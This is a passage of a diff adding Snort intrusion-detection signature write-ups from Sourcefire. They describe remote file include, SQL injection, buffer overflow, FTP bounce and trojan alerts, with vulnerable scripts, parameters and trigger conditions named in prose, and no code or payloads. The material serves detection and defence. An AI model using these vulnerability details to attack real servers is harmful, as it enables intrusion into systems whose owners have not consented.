+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SmartSiteCMS" application running on a webserver. Access to the file "comment.php" using a remote file being passed as the "root" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "root" parameter in the "comment.php" script used by the "SmartSiteCMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SmartSiteCMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000722.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000722
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "lua_output.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "lua_output.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/114.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+114
+
+--
+Summary:
+This event is generated when the Netbus trojan service is responding to 
+an attackers commands on port 12346
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+--
+Detailed Information:
+The program is a backdoor designed for Windows. It allows anyone who
+knows the listening port number and password to remotely control the 
+host.  Intruders access the server using either a text or graphics based
+client.
+
+The backdoor program allows the remote user to execute commands, list
+files, start silent services, share directories, upload and download
+files, manipulate the registry, kill processes, list processes, as well
+as other options, as well as open/close the CD-ROM drive, send
+interactive dialogs to chat with the compromised system, listen to the
+system's microphone (if it has one), and a few other features. 
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows NT
+	Windows 2000
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+Security tool probing for netbus
+Other services configured for 12346
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access to port 12346 from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by John Liss
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+NetBus
+http://www.ntsecurity.net/
+
+--
--- /dev/null
+++ b/doc/signatures/3069.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3069
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"fetch" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2953.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2953
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2636.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2636
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in many
+useful tasks.  The "offline_snapshot.begin_load" procedure is used for
+offline instantiation of snapshots.  This procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck632.html
+
+--
--- /dev/null
+++ b/doc/signatures/1139.txt
@@ -0,0 +1,60 @@
+Rule:  
+--
+
+Sid:
+1139
+
+--
+
+Summary:
+This event is generated when an attempt is made to evade an IDS in a 
+possible web attack by sending an obfuscated request.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+Some CGI attacks can be accomplished by using HEAD instead of GET.
+Additionally, some web servers will interpret "/./" as simply "/".
+An attacker might try to combine these methods in an attempt to
+obfuscate an attack or during the reconnaissance phase of a penetration
+attempt in order to bypass an IDS.
+
+--
+Affected Systems:
+	All Web Servers.
+ 
+--
+Attack Scenarios:
+An attacker may use an automated tool, like Whisker, to obfuscate an
+attack.
+
+--
+Ease of Attack:
+Simple. Exploit scripts and tools are widely available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Examine the host for signs of compromise.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/843.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+843
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000415.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000415
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Bytehoard" application running on a webserver. Access to the file "server.php" using a remote file being passed as the "bhconfig[bhfilepath]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "bhconfig[bhfilepath]" parameter in the "server.php" script used by the "Bytehoard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Bytehoard
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1787.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1787
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000809.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000809
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "RW Download" application running on a webserver. Access to the file "stats.php" using a remote file being passed as the "root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "root_path" parameter in the "stats.php" script used by the "RW Download" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using RW Download
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000543.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000543
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Dating Agent" application running on a webserver. Access 
+to the file "search.php" with SQL commands being passed as the "sex" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "sex" parameter in the "search.php" script used by the 
+"Dating Agent" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Dating Agent
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2133.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 2133
+
+
+--
+Summary:
+This event is generated when an attempt is made to access a Microsoft Biztalk Server application from sources external to the protected network. 
+
+--
+Impact:
+Arbitrary code execution and possible administrator access to the target host.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access a Biztalk Server application. A buffer overrun exists in Biztalk that may lead to an attacker gaining the ability to execute arbitrary code on the host with the privileges of the user running the IIS webserver.
+
+The flaw exists in the HTTP Receiver functionality of Biztalk and this is not enabled by default.
+
+--
+Affected Systems:
+Any host using Microsoft Biztalk.
+
+--
+Attack Scenarios:
+An attacker would need to supply an overly long HTTP POST request to biztalkhttpreceive.dll.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Disable the HTTP Receive functionality.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7469
+http://www.securityfocus.com/bid/7470
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0117
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0118
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/ms03-016.asp
+
+--
--- /dev/null
+++ b/doc/signatures/3441.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+3441
+
+--
+Summary:
+This event is generated when an attempt is made to use the PORT command
+in an FTP session.
+
+--
+Impact:
+Serious. Unauthorized access to the target host. Information disclosure.
+
+--
+Detailed Information:
+The PORT command can be used in an FTP PORT bounce attack to establish
+a connection between the FTP server and another machine listening on 
+an alternative port.
+
+This may lead to unauthorized access to a target host listening on a 
+port not available from outside the protected network.
+
+--
+Affected Systems:
+	Systems using FTP
+
+--
+Attack Scenarios:
+An attacker can issue a PORT command from an FTP session to connect to 
+another machine listening on an alternate port. For example, from an 
+FTP session an attacker could connect to an internal host listening on 
+an alternate web port meant only for internal sessions.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/tech_tips/ftp_port_attacks.html
+
+--
--- /dev/null
+++ b/doc/signatures/1392.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1392
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2429.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2429
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISC INN Usenet/NNTP server.
+
+--
+Impact:
+Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A vulnerability exists in the network news transport protocol server
+from ISC. It may be possible for a remote attacker to exploit a buffer
+overflow condition in the software to execute code of the attackers
+choosing with the privileges of the user running the daemon.
+
+--
+Affected Systems:
+	ISC INN 2.4 .0
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur. Once successful the attacker may
+attempt to escalate privileges by using further local exploits.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2339.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid: 
+2339
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Verilink Netengine Broadband Routers.
+
+--
+Impact:
+Denial of Service (DoS)
+
+--
+Detailed Information:
+TFTP is used to transfer files between hosts. This event is indicative of spurious
+activity in TFTP traffic from a host to a router.
+
+It is possible for an attacker to expoit a DoS condition in
+Netengine routers. If a UDP packet containing a double-null opcode is
+sent to the router's TFTP port the router may crash, thus causing the
+DoS.
+
+--
+Affected Systems:
+	Verilink Netengine Broadband Routers
+
+--
+Attack Scenarios:
+An attacker may use a publicly available exploit script to take
+advantage of the vulnerability.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <matthew.watchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2519.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2519
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of the Private
+Communications Transport (PCT) protocol.
+
+--
+Impact:
+Execution of arbitrary code. Unauthorized administrative access to an
+affected host.
+
+--
+Detailed Information:
+A vulnerability exists in the handling of PCT requests that
+can be manipulated to give an attacker the opportunity to execute
+arbitrary code of their choosing leading to a possible remote
+administrative compromize of an affected host.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003 and XP systems using PCT
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted PCT request to an affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the use of PCT
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000730.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000730
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "BlackList.Examine.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "BlackList.Examine.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2250.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2250
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Magic Winmail Server.
+
+--
+Impact:
+Serious. Possible arbitrary code execution.
+
+--
+Detailed Information:
+The Magic Winmail Server contains a programming error such that 
+exploitation of the USER POP3 command is possible by supplying malicious
+code via the USER command.
+
+--
+Affected Systems:
+	AMAX Information Technologies Inc. Magic Winmail Server 2.3
+
+--
+Attack Scenarios:
+The attacker can connect to the POP3 server and use the USER command to 
+supply the necessary code or the attacker can use the available exploit 
+code.
+
+--
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2551.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2551
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
